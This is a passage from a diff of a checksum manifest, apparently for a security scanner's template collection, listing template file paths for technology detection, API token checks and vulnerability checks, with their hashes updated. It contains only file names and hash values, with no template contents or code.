+http/technologies/tibco-spotfire-services-detect.yaml:f3eb5451b248349831da2b416b874ff1069a8ed9 http/technologies/tileserver-gl.yaml:27fe637c0f3de39676585f41d5980e246441bdab http/technologies/tinyproxy-detect.yaml:1f12faf3ae2dd38f5c8f0aed9753d65ce611b795 http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864 http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4 http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636 -http/technologies/uni-gui-framework.yaml:24da39f35b8c52b287e5c62359c6bdfffafc32a2 +http/technologies/uni-gui-framework.yaml:0112ec2daa09fac04af443ac81329f39cd5a20c7 http/technologies/utility-service-detect.yaml:c6754cc4daf389f30429c27e153462cc4b5f65a4 http/technologies/vbulletin-detect.yaml:a48f02b03dc57037391b6c02e06f20906b9d9015 http/technologies/versa/versa-analytics-server.yaml:ab6b798c55d8379b64cd1bc97b70ee6377f151e5 @@ -7281,8 +7281,8 @@ http/technologies/wordpress/plugins/wps-hide-login.yaml:49e23dfebb88ab4c3822f56d http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:74b65c6c5ca927a3cc48713f2e12af3315585a02 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b585238fc372f9d7131fb53c9bde96f0c8224553 -http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:823e6d8fb3f52400cd29e17aa6e9d9e5215fb639 -http/technologies/wordpress-detect.yaml:cffcda2750ea67cb0bfe228180718a5071f9e031 +http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cdc04aa3d389240302b88aff200be0d24d8e1037 +http/technologies/wordpress-detect.yaml:5d45f8912531a6f38c6c4c95a9b5f5e25f7ac363 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63 http/technologies/wuzhicms-detect.yaml:42d61fccbe91af74c18090d30a93945513224b1d @@ -7291,7 +7291,7 @@ http/technologies/xerox-workcentre-detect.yaml:a3cd237c046d00b80d6abfb0909307ed4 http/technologies/yapi-detect.yaml:eee614bcb01abb87d877683d90a0474881c08830 http/technologies/yeswiki-detect.yaml:6dfae92602cea1093b6b4bb50e1e06aad5209265 http/technologies/ymhome-detect.yaml:76dac1f59e7e5efb41a3911f7add03731d0dcc76 -http/technologies/yourls-detect.yaml:774f0d021e418f9c1f0fd096436cde3d2f9dabc2 +http/technologies/yourls-detect.yaml:d6da6239dc6dd1bd52d193db30612974840d5a3a http/technologies/zap-api-detect.yaml:f201d2fd86330dd738f8f47d22af3b532fc1e5cd http/technologies/zend-server-test-page.yaml:7c9ca127df0c8b3386b8e1647e21a14aa6dfbbd7 http/technologies/zerof-webserver-detect.yaml:abe201e6635a2c6b40f4d6ae69cdf101abb0a9a1 @@ -7423,7 +7423,7 @@ http/token-spray/api-lokalise.yaml:6df4f64b17f96e4742bd735271a8ee0de4a28570 http/token-spray/api-loqate.yaml:eda1d23f54cc5869dcdd8f07019609f4389635be http/token-spray/api-mac-address-lookup.yaml:50a21c925263aa4caf9b60bae4c90c75ab382e12 http/token-spray/api-mailboxvalidator.yaml:95ad72a1af48525ac8b29f71fdfc3c6a7a724baf -http/token-spray/api-mailchimp.yaml:2e80a45ff39e69662a280f88ba66cbec1691ee3e +http/token-spray/api-mailchimp.yaml:6c48cede34aabddc30a3ce1e61154e62be6ca167 http/token-spray/api-mailgun.yaml:8cae98f9ea11186c69007d6d2e462e3769d80073 http/token-spray/api-malshare.yaml:d3b03af5eaf8940240a7e42db96c1ed782db67f9 http/token-spray/api-malwarebazaar.yaml:0f6b07e953eee462f8710c23f25337ae393de580 @@ -7477,7 +7477,7 @@ http/token-spray/api-scrapingdog.yaml:36ec01b41847600aa7f9ed05803dd8f4512f78b7 http/token-spray/api-screenshotapi.yaml:23811c030da5191d10880ff1ca3702e804d51738 http/token-spray/api-securitytrails.yaml:44f62cc4ec23b27f88b04f2fe1cb0c75ff9c05a7 http/token-spray/api-segment.yaml:63b895eba7eb64c444fae6395fc62d771927d1fd -http/token-spray/api-sendgrid.yaml:fd14f1a94896d5714d998a208ce5a25c7f59b6ae +http/token-spray/api-sendgrid.yaml:d42501bbd5841d92ccdb3b99f0d49323f12bb8bc http/token-spray/api-sentry.yaml:c27b4ac6a50680ea817425649ebf3207f47a1b41 http/token-spray/api-serpstack.yaml:8b0856f6dd8f6c8aba7b037e7bc5ca69719e88f8 http/token-spray/api-shodan.yaml:3a23a419b00daa03036abcdb962ad4aac430d158 @@ -7499,7 +7499,7 @@ http/token-spray/api-ticketmaster.yaml:21b22b55f4944da088d0090ee63ccfceb423054b http/token-spray/api-tink.yaml:1eb860865a853677d11a557f5ebebcd64c51c362 http/token-spray/api-tinypng.yaml:281a485188c27b7d0a2fc8a5809fb7d29bc836d1 http/token-spray/api-todoist.yaml:127ffd4ab0f50fe44c3ed4083b50068273d4752a -http/token-spray/api-travisci.yaml:9ef7292ecb41d96e368ce4910f1d382445eba228 +http/token-spray/api-travisci.yaml:8e3f417012d115ed68f99727dc896cc92b913e4b http/token-spray/api-trello.yaml:80802bc415db7de5e5b1a2782c89a23e9eaa7efe http/token-spray/api-twitter.yaml:e4b8e7eb6ef921c659bb5495fd7631459779dd0f http/token-spray/api-urlscan.yaml:27c156eadbeca24e739d7df33fc78bfc2a8fd9ee @@ -7558,7 +7558,7 @@ http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml:cc5b00277d590083d64dddf48f7c507 http/vulnerabilities/avtech/avtech-unauth-file-download.yaml:8d35ad8973b365783595f5a25a26e469d6aae45c http/vulnerabilities/avtech/avtech-verification-bypass.yaml:86e688a4d783b621c2b7340676a320b542376eaf http/vulnerabilities/backdoor/antsword-backdoor.yaml:66bca1b81f43577f983c1b4bb437dec48dc60bad -http/vulnerabilities/backdoor/cisco-implant-detect.yaml:77831f20819b948e17f70a7f1a7f9239634c4a88 +http/vulnerabilities/backdoor/cisco-implant-detect.yaml:40e6f665b63b4acd360b74d0e45387038c904f32 http/vulnerabilities/backdoor/fatpipe-backdoor.yaml:79c76afb42389be4634d42777a1d4bd0cfa26f34 http/vulnerabilities/backdoor/jexboss-backdoor.yaml:97064905cdfd019872ba00fdf7284438d314bb15 http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7c2f1d78897dd98d891 @@ -7574,7 +7574,7 @@ http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:603bb5279bc4d http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:ea1ab53653cf1c170515c6ee5e6867b76f167b01 http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml:aef89b607f0527340246a54d607fb5a0c4533d5e http/vulnerabilities/cisco/cucm-username-enumeration.yaml:8f1f34c21c46c88b1faf80e11363097dc18d7c03 -http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:7866f3668d1f681eff787a1c2b9146a491251e11 +http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:8691b5b9f846049c470e548f0d34528c00455b90 http/vulnerabilities/code42/code42-log4j-rce.yaml:c6eca1ad5491f3ab51671acd9067242f3f77767e http/vulnerabilities/concrete/concrete-xss.yaml:85b12fb54e5f98736f4bc70df764384fe675f2f2 http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:305c4b65dec3bc65e31fcd5c0b72a9841e630064 @@ -7595,8 +7595,8 @@ http/vulnerabilities/discuz/discuz-api-pathinfo.yaml:4cd287eda013330adf57a16f49f http/vulnerabilities/dlink/dlink-netgear-xss.yaml:58360dabdb688a1d3a316ffcb1bf3d67b39eb416 http/vulnerabilities/drupal/drupal-avatar-xss.yaml:1058d534d63fdae5e60b8a97cb170499e4c4ac1e http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml:9edd51637c886ca03c88cbdedca3033fb842b81e -http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml:e1bceaa61a335979e116038539a1c922df160381 -http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml:d17f8d956b25f216f7b3dae0fd51d6867d805cc0 +http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml:3294b1534484babae5d8ca0d07133781d7942c63 +http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml:7314c8456970e5a94ecff7456efb67fabad5aad4 http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml:d1e90625be0514d41048bed71a21e367556b4d4f http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml:2ef0518658108401b361842897fd0a98f6e6d94d http/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml:05bbdb4a1987dc14d013b1b33d82c630b4838b79 @@ -7639,7 +7639,7 @@ http/vulnerabilities/hikvision/hikvision-ivms-file-upload-rce.yaml:94de4453e34e7 http/vulnerabilities/hikvision/hikvision-js-files-upload.yaml:cdcf6ca5518af130ebd36c1531365f6bb79001c5 http/vulnerabilities/httpbin/httpbin-open-redirect.yaml:1b66933da5367fcad1de79ed46e41dd9b6b4543a http/vulnerabilities/httpbin/httpbin-xss.yaml:b8072d3dcf45a6ca85ef27483281733357126da7 -http/vulnerabilities/huatian/huatian-oa-sqli.yaml:f5a02930f177dc693ef6154e787bb656cda830fd +http/vulnerabilities/huatian/huatian-oa-sqli.yaml:88b3f3b3d5693ed5681d729048e3e99532075618 http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml:dbd647cefaf1c14ab1e9f62163272f5b9e8077f4 http/vulnerabilities/huawei/huawei-firewall-lfi.yaml:26c4256fc8f7f9aca152325a69201d40114e7ded http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml:b04f892fc063564b2037ab47afc68fdcb53e9104 @@ -7677,10 +7677,10 @@ http/vulnerabilities/joomla/joomla-marvikshop-sqli.yaml:b348e4689a5a11c4cf8fbd01 http/vulnerabilities/joomla/joomla-marvikshop-xss.yaml:6be8e5607bc2d797c23d1148699f53d6efabc780 http/vulnerabilities/joomla/joomla-solidres-xss.yaml:1822aa529ef26cc67005273a28c63d61962e1cfd http/vulnerabilities/joomla/rusty-joomla.yaml:768286c88d23466fcfcd3e2538b9b170f70d2720 -http/vulnerabilities/jorani/jorani-benjamin-xss.yaml:4709c5754730eb3ce11e618fa9e731930e7ec023 +http/vulnerabilities/jorani/jorani-benjamin-xss.yaml:848d1990b5df6f08d133d289cad7f13c02c59755 http/vulnerabilities/juniper/junos-xss.yaml:2fb77ffeeb6be6b060134ad475574168fbc7dacb http/vulnerabilities/jupyter-notebook-rce.yaml:70bde4f2a81cfcd8fa84033dffa5391ecc67f5cf -http/vulnerabilities/kkfileview-ssrf.yaml:6c5e8dee68280e2773268838eb779266a0e2ceb5 +http/vulnerabilities/kkfileview-ssrf.yaml:01d871111cc9545a8676bc4298d363b4337e9459 http/vulnerabilities/landray/landray-eis-sqli.yaml:2e13e31d6789037a840228f9dddddf5beff77d24 http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml:8f40ccd19c355cf346830fcdf2e91d6b653f178d http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml:55ae9bebeb50e27d2b5400649d133093616a5427 @@ -7723,7 +7723,7 @@ http/vulnerabilities/other/alumni-management-sqli.yaml:44c134fdb53c7bf6bbc9779b7 http/vulnerabilities/other/apache-druid-log4j.yaml:de3259cc8fff10dc0f2808f44db4ed6a811ea5e3 http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e http/vulnerabilities/other/aquatronica-info-leak.yaml:6b90129c71b401a56ea780ca90fd695d6d8a4a76 -http/vulnerabilities/other/array-vpn-lfi.yaml:50b84caddedf1b89afcba09bd5cbbdcfb0005897 +http/vulnerabilities/other/array-vpn-lfi.yaml:88cd6e4d16199af1df04b1cc1f0618412aeef118 http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 http/vulnerabilities/other/aspcms-commentlist-sqli.yaml:62d97842cbaf3577d193d53daf38c78c55369e5a http/vulnerabilities/other/aspnuke-openredirect.yaml:0253728ab4ba638b3469701d2a70a1f364de32d5 @@ -7743,7 +7743,7 @@ http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e http/vulnerabilities/other/castel-digital-sqli.yaml:a2e2da7ae8d480b2bf621f6b11979cc2d8a434ff http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067 -http/vulnerabilities/other/cerio-dt-rce.yaml:e565744efe12c9b0deb5f8898a7d9bf30a334a43 +http/vulnerabilities/other/cerio-dt-rce.yaml:192b258d7ba96f16ace9c57b6aa6e42a5b5edcc8 http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199 http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml:bb592cb50df3e8b218c8c655b5a4ce12d1abf72c @@ -7775,7 +7775,7 @@ http/vulnerabilities/other/dss-download-fileread.yaml:99d5bcf47324083def79e63def http/vulnerabilities/other/duomicms-sql-injection.yaml:ee36f8e9e2bfda358c4851065c331d9988f55537 http/vulnerabilities/other/dzzoffice-xss.yaml:8e89cae5618ff076d9bdadce356bb4ae547844d4 http/vulnerabilities/other/eaa-app-lfi.yaml:97b0823d04ad3588ce93c66dd73c78dff743f1be -http/vulnerabilities/other/easycvr-info-leak.yaml:4a339e7ca4c5dbec8db0c3f71ab8d9c47f503e6b +http/vulnerabilities/other/easycvr-info-leak.yaml:fb7968e0a3043d7b1882abf1b65229f55f6786cb http/vulnerabilities/other/easyimage-downphp-lfi.yaml:c13b2da7bd29bd39b5c0e7b09d94a864c38367ac http/vulnerabilities/other/ecology-oa-file-sqli.yaml:6ac7efef6739bb5063e9b1787fe1c6120048a56a http/vulnerabilities/other/ecshop-sqli.yaml:151963cca04a4163b76e6ff7021db99290abc406 @@ -7882,7 +7882,7 @@ http/vulnerabilities/other/mcafee-epo-rce.yaml:f8d19ca88cfd668f5deee632670d8fb07 http/vulnerabilities/other/metabase-log4j.yaml:745d7b38dc9f19408523c47bf02dd8c511608d23 http/vulnerabilities/other/metinfo-lfi.yaml:9cd253a103a3bb51814f01ffff9ad993c64b752b http/vulnerabilities/other/microstrategy-ssrf.yaml:ef2454ae7ee0712021c1f4b7e590dbaf5ce01b17 -http/vulnerabilities/other/microweber-xss.yaml:e8ea7f0a089fdb3b2f151c52a64e16eb2cbc2c0c +http/vulnerabilities/other/microweber-xss.yaml:707b244237c005fb52948ec4701ee3919f919507 http/vulnerabilities/other/mida-eframework-xss.yaml:a613a8bc3c546c3a5296644982c67f9bc6655247 http/vulnerabilities/other/minimouse-lfi.yaml:c44857b3aa70fd4682cdac339f8c5d73953c4074 http/vulnerabilities/other/mirai-unknown-rce.yaml:791e923045ee77c451525f26a6e44a33073bb06f @@ -7938,7 +7938,7 @@ http/vulnerabilities/other/phuket-cms-xss.yaml:a66543f506ca15df59732da947df46ebe http/vulnerabilities/other/pmb-directory-traversal.yaml:3edd65226116e222366fb702f21ea383bd6a36a0 http/vulnerabilities/other/pmb-local-file-disclosure.yaml:a98bdbfe2c304c27096a31febde9927d89073c1b http/vulnerabilities/other/pmb-sqli.yaml:a8b2c7246901ec38ea0a9685c51d04c6faa4a2ca -http/vulnerabilities/other/pmb-xss.yaml:650ab5217e0526f0c97f88eb68e6277794410f0d +http/vulnerabilities/other/pmb-xss.yaml:3e9471bec05c6c3974e2396aa97ba5222d3a6244 http/vulnerabilities/other/podcast-generator-ssrf.yaml:2f4a63c8959c6a9327cd0d5c7a1db427eb5376ad http/vulnerabilities/other/pollbot-redirect.yaml:24e331e5f53a3512a35ff500a32d9c20ca794d14 http/vulnerabilities/other/powercreator-cms-rce.yaml:60d0367c27911f3f68fa39f07a0b5b609712d0e8 @@ -7949,7 +7949,7 @@ http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml:4c http/vulnerabilities/other/qihang-media-disclosure.yaml:e6bb5960b1052e596d43bf3faf0abe3975c653b6 http/vulnerabilities/other/qihang-media-lfi.yaml:5179a2b7499e31740c7e5853134f540c4a9ae20a http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml:93bfb8a42d56a33f2a5e98198809398d8959fec6 -http/vulnerabilities/other/quick-cms-sqli.yaml:387f55310a6e525c84460df3e0da4745ff453105 +http/vulnerabilities/other/quick-cms-sqli.yaml:5a29acfa062197c1c0481be7a651e1f8db198536 http/vulnerabilities/other/rconfig-file-upload.yaml:baea5dfb06998b728d7ff9147698b3d812a8df14 http/vulnerabilities/other/reddittop-rss-xss.yaml:2b532fb620fd700b948d65dfc69227741e2adb07 http/vulnerabilities/other/rentequip-xss.yaml:f9841ce026f105a62494dac86be35464c59393ba @@ -7997,12 +7997,12 @@ http/vulnerabilities/other/talroo-jobs-xss.yaml:34af231d34704c63a01bbeba21bc7174 http/vulnerabilities/other/tamronos-rce.yaml:0f057fdf03116f53c69573789145ff009573a639 http/vulnerabilities/other/tamronos-user-creation.yaml:2c73bb0f38c1ef165578c00832d316ed40faeefe http/vulnerabilities/other/tekon-info-leak.yaml:78521259191534295b7ea481980c2adee69a17ab -http/vulnerabilities/other/tendat-credential.yaml:a856f441a8d54650c5c7c8b80ef721111bb500ef +http/vulnerabilities/other/tendat-credential.yaml:112422e9a7f32b9485aa4f9cc0ddbf373eda0f6b http/vulnerabilities/other/thinkific-redirect.yaml:251ca37bf18bf81069db0b137edd2afa0d0e4f58 http/vulnerabilities/other/thruk-xss.yaml:b6bd8aac6da2278ad8142ee74120625d3309fe4f http/vulnerabilities/other/tianqing-info-leak.yaml:bfe5a313b8c2fad5722b13e933fe3b65bc0eb89e http/vulnerabilities/other/tikiwiki-reflected-xss.yaml:d8a855b67a637c0955689995e928b901d355edbb -http/vulnerabilities/other/tikiwiki-xss.yaml:cfe8c41433432e7136cc319c427afffa8a2511c5 +http/vulnerabilities/other/tikiwiki-xss.yaml:e76db1bed70419008f4aea68ef1d8923888697a9 http/vulnerabilities/other/tpshop-directory-traversal.yaml:eadec6bce504ad7a552db1b675350631961c2b1d http/vulnerabilities/other/turbocrm-xss.yaml:faf1ac68ae52dd60d9da09086f128c43aa8e80a8 http/vulnerabilities/other/twig-php-ssti.yaml:cbfa054ab976a05fbd8bb33922015fd7233a4d7a @@ -8049,8 +8049,8 @@ http/vulnerabilities/php/php-xdebug-rce.yaml:b50c0de8f5f6590bae1f200c2b6624f69e0 http/vulnerabilities/phpmyadmin-unauth.yaml:d15ef415782dbc76f48b70d10f1520819b28c7e8 http/vulnerabilities/portainer-init-deploy.yaml:93713c9e50dea4da7a387e9be325229a914eb433 http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:1dde1d96626b10652831b3222e3f38f3c894fce4 -http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:e412881f521a4d5d350da2f825540251c38aabed -http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:e66d21a9fdd51c9ccc829ac69c1d63f06181d5c1 +http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:8b14aa83ae101525635831123e3bfd977688ff7a +http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:53b7006e21a8789893841514a713a5568cb36b4d http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:b4125e258896dd6b614f98e0443fdba778b4ca1a http/vulnerabilities/qibocms-file-download.yaml:c5c1fb9a39ad1d8ac93a8163154bb2887ddf150d http/vulnerabilities/rails/rails6-xss.yaml:b28fc53f49e6d7a89c50a3da233570d3b05199a4 @@ -8178,7 +8178,7 @@ http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml:dcc37c04500079 http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml:54074e96088d1f83584e0691a23bfee8084b5e99 http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml:831180d7eab630a2bbef32b93ce7ceaaf7b8a271 http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml:1e1fc323fa169154911e1021beb1456212b02463 -http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml:b242a2eb2712669d306bcaab5ea33d467b0a2941 +http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml:144b0f26151a07bbd1fce259baa36895b195b3ac http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml:5ef71d0ffcca4ea57be50a2f8782f6f9be0b2f8e http/vulnerabilities/weaver/weaver-userselect-unauth.yaml:a1babbe5ca73ebc7290010a1e5c59f8e1dedd503 http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml:fe6f785e3ba7a8990a0c5b3d248c75abdeda022a @@ -8250,7 +8250,7 @@ http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml:7c640995ee7efa79791af94 http/vulnerabilities/wordpress/watu-xss.yaml:7c2e2e4243dc0c7e95c494b365fab550869595f6 http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml:20f4513cb63d35b7ad428f8cc0f409efc2c33ee2 http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml:57027e142e6204ddd61f5110be2afd3915bcb4dd -http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:06e5d8c96afa6b5298d67c8c9020693148b77ae0 +http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:c02542e370926cd91463ef95fff1d124490ac5d3 http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml:7c831fd57fcfebd4d567dc1a13f8fa8fafa2b6b2 http/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml:5baba890d00daae20eb4e5f2dea36d5e1075b3a9 http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml:d0893166dea4943ff086abbb4bdad272a134bbd0 @@ -8275,28 +8275,28 @@ http/vulnerabilities/wordpress/wordpress-user-enum.yaml:cf57cc744426c6a4e0ebfc51 http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml:107dbe4bb9bde9849367ea7c5b88fe06f209b30e http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml:ae2aef9aa7745fdec09338a652da2963736a85e1 http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml:5fd65278749524917f105e00cf7e8123e84dbe21 -http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml:18c7e147308be677d4a65a0d0eea1e48843d621f +http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml:6580e7aafc5b5e914adb18fa3ace2af63fded3ec http/vulnerabilities/wordpress/wordpress-wp-cron.yaml:23c619da3445043cca4681d30d3ff3e5e4cb9c54 http/vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml:b93c44628a86329fba4ad09053f0049d66eec010 -http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml:68054429d6cd37acdd1adcab25423b68c875500b +http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml:21a21b20f1e7a4c7008bb7ac62f38d897f6ab05a http/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml:1828d443854306a616b2a9624848c28284fbb789 http/vulnerabilities/wordpress/wp-adaptive-xss.yaml:e44322e25cef461caf29f67d01ded889ffa560b8 http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml:94c4fa2a5a16b780320818a4e7b4ee70406a2b0b http/vulnerabilities/wordpress/wp-adivaha-xss.yaml:8c442fe54900e5a4873923cfba3431e3a6472735 http/vulnerabilities/wordpress/wp-all-export-xss.yaml:835dab6e7769a010535ff599f85d181918b92a31 http/vulnerabilities/wordpress/wp-altair-listing.yaml:8b4bcd2bb94c42e26f654308a73865b836402b96 -http/vulnerabilities/wordpress/wp-ambience-xss.yaml:a95007ef42bd88d6d94ae02398c568cf8f34241f +http/vulnerabilities/wordpress/wp-ambience-xss.yaml:824d448ae39df0c268d8d52a690d8ddd44821089 http/vulnerabilities/wordpress/wp-arforms-listing.yaml:1d6ff4f881b4fe560e40f931659518449cec25d6 http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml:0b39e0694f6d40f67f887dbd6cfe2e5405bf1d83 http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml:caf5f60512f9b2d1d1881ab49f20cf0ceed1890a http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml:d3ed04f7ea1318cc872d77ee4fe3aad813041b0a http/vulnerabilities/wordpress/wp-config-setup.yaml:d5a639e548f566b597f91aa5fa36bef2f836b8a6 -http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml:71fbb05132834b502cdad6b6c7ad78e7dddb44ac +http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml:ee8a8d4c9264368e4f8605950ad30655ed784540 http/vulnerabilities/wordpress/wp-ellipsis-xss.yaml:59d59b9813e51eeb2361b55415343a0e0a7deebf http/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml:d6e0d4521359a8344fa61841df50732cdce9f37f http/vulnerabilities/wordpress/wp-enabled-registration.yaml:db89a23835bfbe0a515623789174144569196c5b -http/vulnerabilities/wordpress/wp-finder-xss.yaml:89fc5865110b502e3e852065143eec5ae5d8e9af -http/vulnerabilities/wordpress/wp-flagem-xss.yaml:0aafd823b4718f370854ca3e714e6298f275ea53 +http/vulnerabilities/wordpress/wp-finder-xss.yaml:5422ec87869759fd93103328d53d3a7b328805b6 +http/vulnerabilities/wordpress/wp-flagem-xss.yaml:6a53694f9788a3a8c87f86957bf548c5cd474036 http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml:41ad122bb733f379eec0434c62c65c2cd67d0299 http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml:251496cac3d332f8de0b56e3f00b6f3fef51efa4 http/vulnerabilities/wordpress/wp-googlemp3-lfi.yaml:0fcf8edf64f561dff14505e775e08554db8bf473 @@ -8308,16 +8308,16 @@ http/vulnerabilities/wordpress/wp-insert-php-xss.yaml:3eaf44b66a99ef53c1740022d3 http/vulnerabilities/wordpress/wp-iwp-client-listing.yaml:2e6cc801fc6f3a12e5b93c42f494365294aea012 http/vulnerabilities/wordpress/wp-javospot-lfi.yaml:8b8c6f276717370636f5e4b7f14760df289da81e http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml:9c350652feff4df4737b9cb4911dff1693ce59a8 -http/vulnerabilities/wordpress/wp-knews-xss.yaml:475fdc5ae2efdf847bc5de5683dc20d7d481a659 +http/vulnerabilities/wordpress/wp-knews-xss.yaml:22b97284cca3256063c5d24ef9f1689cdfafe958 http/vulnerabilities/wordpress/wp-license-file.yaml:6bbd118dc5a73da7dbd67041e02e56d826e3dfd6 http/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml:4510dc0ec87ea209efbba0579e419ef70a72a2e2 http/vulnerabilities/wordpress/wp-mega-theme.yaml:babe80d75c931531286156a94c5443042740a266 http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml:89e2cab8d7b9d4e28cfb07723eaae595582930b0 http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml:314419535a4037687762e958d70c948daf0a3a6c http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml:73f53accac2e5dbce98a67e4c81c67437a5cffd8 -http/vulnerabilities/wordpress/wp-nextgen-xss.yaml:86f488aab3a19a9c96763efba9f8cb439bd7fc5f +http/vulnerabilities/wordpress/wp-nextgen-xss.yaml:022c392174e770815d2bb9afbe99bddbbc1f198d http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml:03b4cfb50a81b1421de083d164ec82ab1a98a1d9 -http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml:4598c9c2f5aa28413cb1d808b365c255d2bd1f60 +http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml:e00993d8171dac4e662c751663a0bfc18ad5db62 http/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml:1d20a1a68f350fd6024c05bda306437b31a9ea2f http/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml:d3d08abd020608b5e9c8cadac75953f63bdae8bf http/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml:223c43024e8162281a17dc729d9049a157139ab9 @@ -8329,11 +8329,11 @@ http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml:45f2138e8baf4af0a71a86618 http/vulnerabilities/wordpress/wp-real-estate-xss.yaml:9eccbb26d2a67cdf5afc4c5b3fbc49aa0c2ece59 http/vulnerabilities/wordpress/wp-reality-estate-theme.yaml:35869bac3168d78c85d28134dce3e53f4d0ed454 http/vulnerabilities/wordpress/wp-related-post-xss.yaml:170250e4e48288b86449655d5c447bb52ed6772a -http/vulnerabilities/wordpress/wp-securimage-xss.yaml:3e1b74a1a0ea350c7ff60da8bfcf3f36fac0210c +http/vulnerabilities/wordpress/wp-securimage-xss.yaml:4b51a7c3c95b56b408e3197b28a8800bbf94f957 http/vulnerabilities/wordpress/wp-security-open-redirect.yaml:556e7b23ab6b2ac5db2e53f58c946a4a92e14912 http/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml:1e7de7df67e50bc32088aabdf0f2874925a51beb http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml:53c9899fabf461177fcbfea93c1a5c8a5674eeda -http/vulnerabilities/wordpress/wp-slideshow-xss.yaml:742a43aa7d2966af6dc680bf5b82ce863a39bad5 